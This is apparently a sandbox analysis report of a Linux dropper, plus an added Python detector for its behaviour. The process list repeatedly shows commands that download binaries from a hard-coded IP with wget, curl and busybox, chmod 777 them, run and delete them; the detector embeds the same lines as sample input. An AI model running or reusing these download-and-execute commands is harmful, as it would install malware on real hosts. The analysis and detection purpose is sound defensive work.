120s

Command Line

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A

Processes

/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]
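
The process list above (and the identical one under behavioral1) is one loop repeated per payload name: fetch the file from http://216.126.231.240/bins/ with wget, curl -O and busybox wget in turn, chmod 777 it, run it from the current directory, delete it, move to the next name. The Python below is an added example, not part of the sandbox report or the sample; it reconstructs that loop from command lines (a handful transcribed from the list above as constructed input, including the truncated final cycle) and alerts only when several distinct payloads complete the full download, chmod, exec, rm sequence. The execute-bit test accepts any mode that sets an x bit, which generalises beyond the chmod 777 the report shows; that generalisation is an assumption of the example.

```python
import re
from collections import OrderedDict

# Command lines transcribed from the process list above: the initial sample,
# two complete download cycles and the truncated cycle that ends the list.
# Constructed sample input for this example, not a live sandbox log.
SAMPLE_CMDLINES = [
    "/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN",
    "/bin/rm bins.sh",
    "wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu",
    "curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu",
    "/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu",
    "chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu",
    "./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu",
    "rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu",
    "wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr",
    "curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr",
    "/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr",
    "chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr",
    "./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr",
    "rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr",
    # the list ends mid-cycle: download attempts only, no chmod/exec/rm
    "wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B",
    "curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B",
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
FULL_CYCLE = ("download", "chmod", "exec", "rm")


def _grants_exec(mode):
    """True if a chmod mode string sets any execute bit (777 in the report; +x forms are an assumed generalisation)."""
    if "x" in mode:
        return True
    try:
        return int(mode, 8) & 0o111 != 0
    except ValueError:
        return False


def classify(cmd):
    """Map one command line to (stage, staged filename, url-or-None), or None if it is not part of the loop."""
    argv = cmd.split()
    if not argv:
        return None
    # "/bin/busybox wget ..." is the same download step as "wget ..."
    if argv[0].rsplit("/", 1)[-1] == "busybox" and len(argv) > 1:
        argv = argv[1:]
    prog = argv[0].rsplit("/", 1)[-1]
    if prog in ("wget", "curl"):
        m = URL_RE.search(cmd)
        if m:
            return ("download", m.group(0).rsplit("/", 1)[-1], m.group(0))
    if prog == "chmod" and len(argv) >= 3 and _grants_exec(argv[1]):
        return ("chmod", argv[-1], None)
    if prog == "rm" and len(argv) >= 2:
        return ("rm", argv[-1], None)
    if argv[0].startswith("./") and len(argv) == 1:
        return ("exec", argv[0][2:], None)
    return None


def reconstruct_stages(cmdlines):
    """Group loop events by staged filename, preserving first-seen order."""
    stages = OrderedDict()
    for cmd in cmdlines:
        hit = classify(cmd)
        if hit is None:
            continue
        stage, name, url = hit
        entry = stages.setdefault(name, {"steps": [], "urls": set()})
        entry["steps"].append(stage)
        if url:
            entry["urls"].add(url)
    return stages


def detect_dropper_loops(cmdlines, min_complete=2):
    """Alert when at least min_complete distinct payloads went through download -> chmod -> exec -> rm."""
    stages = reconstruct_stages(cmdlines)
    complete, partial = [], []
    for name, entry in stages.items():
        seen = []
        for step in entry["steps"]:
            if step not in seen:        # wget/curl/busybox retries collapse to one "download"
                seen.append(step)
        if tuple(seen) == FULL_CYCLE:
            complete.append(name)
        else:
            partial.append((name, tuple(seen)))
    urls = sorted({u for e in stages.values() for u in e["urls"]})
    hosts = sorted({u.split("/")[2] for u in urls})
    return {"alert": len(complete) >= min_complete, "complete": complete,
            "partial": partial, "urls": urls, "hosts": hosts}


if __name__ == "__main__":
    result = detect_dropper_loops(SAMPLE_CMDLINES)
    print("alert:", result["alert"])
    print("payloads executed and removed:", result["complete"])
    print("incomplete cycles:", result["partial"])
    print("download hosts:", result["hosts"])
```

The threshold of two complete cycles is deliberate: a single download, chmod, run, delete sequence also describes a legitimate installer, whereas many different files from the same path each run once and then removed is the multi-architecture pattern visible in this report. The "partial" output keeps the `rm bins.sh` self-deletion and the truncated last cycle visible instead of silently dropping them.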

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
